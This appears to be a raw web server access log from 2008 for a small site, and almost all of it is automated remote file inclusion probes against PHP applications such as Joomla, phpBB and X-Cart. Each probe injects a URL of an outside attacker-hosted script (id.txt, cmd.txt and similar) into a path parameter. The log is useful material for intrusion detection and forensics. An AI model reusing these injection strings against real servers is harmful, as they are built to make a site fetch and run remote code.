72.232.247.138 - - [20/Apr/2008:17:00:18 -0700] "GET /logs/access_080113.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.247.138 - - [20/Apr/2008:17:00:18 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.247.138 - - [20/Apr/2008:17:00:18 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.10.228 - - [20/Apr/2008:17:00:22 -0700] "GET /logs/access.log/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
204.15.10.228 - - [20/Apr/2008:17:00:22 -0700] "GET /Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
204.15.10.228 - - [20/Apr/2008:17:00:22 -0700] "GET /logs/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
204.15.10.228 - - [20/Apr/2008:17:00:22 -0700] "GET /logs/access_070917.log/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
200.62.142.210 - - [20/Apr/2008:17:01:29 -0700] "GET /logs/access_080225.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
200.62.142.210 - - [20/Apr/2008:17:01:29 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
200.62.142.210 - - [20/Apr/2008:17:01:30 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
72.51.46.161 - - [20/Apr/2008:17:02:19 -0700] "GET /logs/access.log//main.php?sayfa=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
72.51.46.161 - - [20/Apr/2008:17:02:19 -0700] "GET //main.php?sayfa=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
72.51.46.161 - - [20/Apr/2008:17:02:19 -0700] "GET /logs//main.php?sayfa=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
72.51.46.161 - - [20/Apr/2008:17:02:31 -0700] "GET /logs/access_080324.log//main.php?sayfa=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
69.89.31.222 - - [20/Apr/2008:17:02:47 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/spread.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.galf.org"
69.89.31.222 - - [20/Apr/2008:17:02:47 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/spread.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.galf.org"
69.89.31.222 - - [20/Apr/2008:17:02:47 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
69.89.31.222 - - [20/Apr/2008:17:02:47 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
200.62.142.210 - - [20/Apr/2008:17:04:57 -0700] "GET /logs/access_071231.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
72.232.247.138 - - [20/Apr/2008:17:06:10 -0700] "GET /logs/access_070730.log//skin/zero_vote/ask_password.php?dir=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.247.138 - - [20/Apr/2008:17:06:10 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.247.138 - - [20/Apr/2008:17:06:10 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.149.160.250 - - [20/Apr/2008:17:07:39 -0700] "GET /logs/access.log/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.149.160.250 - - [20/Apr/2008:17:07:39 -0700] "GET /Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.149.160.250 - - [20/Apr/2008:17:07:39 -0700] "GET /logs/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.240.231.154 - - [20/Apr/2008:17:07:39 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.240.231.154 - - [20/Apr/2008:17:07:40 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.232.247.138 - - [20/Apr/2008:17:07:57 -0700] "GET /logs/access_080310.log//skin/zero_vote/ask_password.php?dir=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.213.79.148 - - [20/Apr/2008:17:08:04 -0700] "GET /logs/access_070826.log///////////index2.php?mosConfig_absolute_path=http://www.hilot.co.il/sorceid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.213.79.148 - - [20/Apr/2008:17:08:04 -0700] "GET ///////////index2.php?mosConfig_absolute_path=http://www.hilot.co.il/sorceid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.213.79.148 - - [20/Apr/2008:17:08:04 -0700] "GET /logs///////////index2.php?mosConfig_absolute_path=http://www.hilot.co.il/sorceid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.193.60.15 - - [20/Apr/2008:17:08:09 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://odyrt.net/info/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.213.79.148 - - [20/Apr/2008:17:08:19 -0700] "GET /logs/access.log///////////index2.php?mosConfig_absolute_path=http://www.hilot.co.il/sorceid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.149.160.250 - - [20/Apr/2008:17:09:57 -0700] "GET /logs/access_070716.log/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.9.129.6 - - [20/Apr/2008:17:11:22 -0700] "GET /logs/access_080324.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [20/Apr/2008:17:11:22 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [20/Apr/2008:17:11:23 -0700] "GET /logs/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [20/Apr/2008:17:11:41 -0700] "GET /logs/access_071008.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.55.6.34 - - [20/Apr/2008:17:13:44 -0700] "GET /logs/access.log//main.php?sayfa=U'R%20AttackeR?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
74.55.6.34 - - [20/Apr/2008:17:13:44 -0700] "GET //main.php?sayfa=U'R%20AttackeR?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
74.55.6.34 - - [20/Apr/2008:17:13:44 -0700] "GET /logs//main.php?sayfa=U'R%20AttackeR?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
69.58.0.71 - - [20/Apr/2008:17:13:47 -0700] "GET /logs/index.php?pagina=http://www.troop66nm.org/image/response1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
69.58.0.71 - - [20/Apr/2008:17:13:47 -0700] "GET /index.php?pagina=http://www.troop66nm.org/image/response1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
74.55.6.34 - - [20/Apr/2008:17:13:56 -0700] "GET /logs/access_080324.log//main.php?sayfa=U'R%20AttackeR?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
220.80.107.90 - - [20/Apr/2008:17:14:14 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
220.80.107.90 - - [20/Apr/2008:17:14:14 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
220.80.107.90 - - [20/Apr/2008:17:14:15 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.89.31.222 - - [20/Apr/2008:17:16:17 -0700] "GET /logs/index.php?p=http://www.rentacarspain.net//modules/Forums/admin/.muie/spread.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.galf.org"
69.89.31.222 - - [20/Apr/2008:17:16:17 -0700] "GET /index.php?p=http://www.rentacarspain.net//modules/Forums/admin/.muie/spread.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.galf.org"
69.89.31.222 - - [20/Apr/2008:17:16:17 -0700] "GET /logs/index.php?p=http://www.rentacarspain.net//modules/Forums/admin/.muie/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
69.89.31.222 - - [20/Apr/2008:17:16:17 -0700] "GET /index.php?p=http://www.rentacarspain.net//modules/Forums/admin/.muie/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
72.232.247.138 - - [20/Apr/2008:17:16:44 -0700] "GET /logs/access_080113.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.247.138 - - [20/Apr/2008:17:16:44 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.247.138 - - [20/Apr/2008:17:16:44 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.240.231.154 - - [20/Apr/2008:17:17:33 -0700] "GET /logs/access_080113.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.74.195.98 - - [20/Apr/2008:17:17:57 -0700] "GET /logs/access_080317.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.geocities.com/kumpulan_surat_sephani/jabodetabek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
77.74.195.98 - - [20/Apr/2008:17:17:58 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.geocities.com/kumpulan_surat_sephani/jabodetabek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
77.74.195.98 - - [20/Apr/2008:17:17:58 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.geocities.com/kumpulan_surat_sephani/jabodetabek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
77.74.195.98 - - [20/Apr/2008:17:17:58 -0700] "GET /logs/access_080310.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.geocities.com/kumpulan_surat_sephani/jabodetabek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
77.74.195.98 - - [20/Apr/2008:17:18:07 -0700] "GET /logs/access_080317.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.geocities.com/kumpulan_surat_sephani/jabodetabek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
77.74.195.98 - - [20/Apr/2008:17:18:07 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.geocities.com/kumpulan_surat_sephani/jabodetabek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
77.74.195.98 - - [20/Apr/2008:17:18:07 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.geocities.com/kumpulan_surat_sephani/jabodetabek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
77.74.195.98 - - [20/Apr/2008:17:18:08 -0700] "GET /logs/access_080310.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.geocities.com/kumpulan_surat_sephani/jabodetabek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
72.232.247.138 - - [20/Apr/2008:17:18:29 -0700] "GET /logs/access_080114.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
220.80.107.90 - - [20/Apr/2008:17:19:14 -0700] "GET /logs/access_080113.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.232.247.138 - - [20/Apr/2008:17:19:53 -0700] "GET /logs/access_080114.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.8.95 - - [20/Apr/2008:17:20:02 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
216.146.28.254 - - [20/Apr/2008:17:25:20 -0700] "GET //?path[docroot]=http://multiplan.pl/modules/test.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
216.146.28.254 - - [20/Apr/2008:17:25:20 -0700] "GET /logs//?path[docroot]=http://multiplan.pl/modules/test.txt??? HTTP/1.1" 200 7378 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
74.6.18.217 - - [20/Apr/2008:17:25:47 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.24.230 - - [20/Apr/2008:17:25:48 -0700] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
81.173.7.100 - - [20/Apr/2008:17:26:25 -0700] "GET /index2.php?page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
74.53.197.2 - - [20/Apr/2008:17:26:55 -0700] "GET /logs/access_080113.log//index.php?p=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.197.2 - - [20/Apr/2008:17:26:55 -0700] "GET //index.php?p=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.197.2 - - [20/Apr/2008:17:26:55 -0700] "GET /logs//index.php?p=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.22.89.194 - - [20/Apr/2008:17:27:02 -0700] "GET /logs/access_080113.log//index.php?p=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.22.89.194 - - [20/Apr/2008:17:27:02 -0700] "GET //index.php?p=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.22.89.194 - - [20/Apr/2008:17:27:02 -0700] "GET /logs//index.php?p=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.62.142.210 - - [20/Apr/2008:17:29:09 -0700] "GET /logs/access_080113.log/index.php?p=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
200.62.142.210 - - [20/Apr/2008:17:29:09 -0700] "GET /index.php?p=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
200.62.142.210 - - [20/Apr/2008:17:29:09 -0700] "GET /logs/index.php?p=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
64.26.63.23 - - [20/Apr/2008:17:29:11 -0700] "GET /errors.php/errors.php?error=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
64.26.63.23 - - [20/Apr/2008:17:29:11 -0700] "GET /logs/errors.php/errors.php?error=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
72.232.247.138 - - [20/Apr/2008:17:29:31 -0700] "GET /logs/access_080113.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.247.138 - - [20/Apr/2008:17:29:31 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.247.138 - - [20/Apr/2008:17:29:31 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.119.182.47 - - [20/Apr/2008:17:30:18 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.imageforum.ru//language/lang_english/languages/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.galf.org"
64.119.182.47 - - [20/Apr/2008:17:30:18 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.imageforum.ru//language/lang_english/languages/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.galf.org"
202.190.76.246 - - [20/Apr/2008:17:30:26 -0700] "GET /logs/access_080113.log//configuration.php?mosConfig_live_site=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.190.76.246 - - [20/Apr/2008:17:30:30 -0700] "GET //configuration.php?mosConfig_live_site=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.190.76.246 - - [20/Apr/2008:17:30:31 -0700] "GET /logs//configuration.php?mosConfig_live_site=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.119.182.47 - - [20/Apr/2008:17:31:02 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.imageforum.ru//language/lang_english/languages/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "galf.org"
204.15.120.73 - - [20/Apr/2008:17:32:18 -0700] "GET /logs/access_080317.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://geocities.com/kumpulan_surat_sephani/jabodetabek.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.120.73 - - [20/Apr/2008:17:32:18 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://geocities.com/kumpulan_surat_sephani/jabodetabek.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.120.73 - - [20/Apr/2008:17:32:19 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://geocities.com/kumpulan_surat_sephani/jabodetabek.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.120.73 - - [20/Apr/2008:17:32:20 -0700] "GET /logs/access_080310.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://geocities.com/kumpulan_surat_sephani/jabodetabek.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.86.99.66 - - [20/Apr/2008:17:36:22 -0700] "GET /logs/access.log/auth.php?xcart_dir=http://glycol.ca/forum/help/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
70.86.99.66 - - [20/Apr/2008:17:36:23 -0700] "GET /auth.php?xcart_dir=http://glycol.ca/forum/help/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
70.86.99.66 - - [20/Apr/2008:17:36:23 -0700] "GET /logs/auth.php?xcart_dir=http://glycol.ca/forum/help/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
81.173.7.100 - - [20/Apr/2008:17:42:41 -0700] "GET /logs/access_080107.log/index2.php?page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
81.173.7.100 - - [20/Apr/2008:17:42:41 -0700] "GET /logs/index2.php?page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
81.173.7.100 - - [20/Apr/2008:17:43:10 -0700] "GET /logs/access_071210.log/index2.php?page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
216.118.97.248 - - [20/Apr/2008:17:45:54 -0700] "GET /logs/index.php?p=http://www.troop66nm.org/image/response1?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.galf.org"
216.118.97.248 - - [20/Apr/2008:17:45:54 -0700] "GET /index.php?p=http://www.troop66nm.org/image/response1?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.galf.org"
216.241.32.144 - - [20/Apr/2008:17:57:39 -0700] "GET /logs/access_080114.log/errors.php/errors.php?error=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.galf.org"
216.241.32.144 - - [20/Apr/2008:17:57:39 -0700] "GET /errors.php/errors.php?error=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.galf.org"
216.241.32.144 - - [20/Apr/2008:17:57:39 -0700] "GET /logs/errors.php/errors.php?error=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.galf.org"
202.190.76.246 - - [20/Apr/2008:17:57:39 -0700] "GET /logs/access_080114.log//configuration.php?mosConfig_live_site=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.197.2 - - [20/Apr/2008:17:58:48 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.197.2 - - [20/Apr/2008:17:58:48 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.197.2 - - [20/Apr/2008:17:58:48 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.18.218 - - [20/Apr/2008:18:00:24 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.11.221 - - [20/Apr/2008:18:00:24 -0700] "GET /logs/access_070730.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
216.241.32.144 - - [20/Apr/2008:18:00:55 -0700] "GET /logs/access.log/errors.php/errors.php?error=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.galf.org"
62.117.106.4 - - [20/Apr/2008:18:01:20 -0700] "GET /logs/access_070820.log//?mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
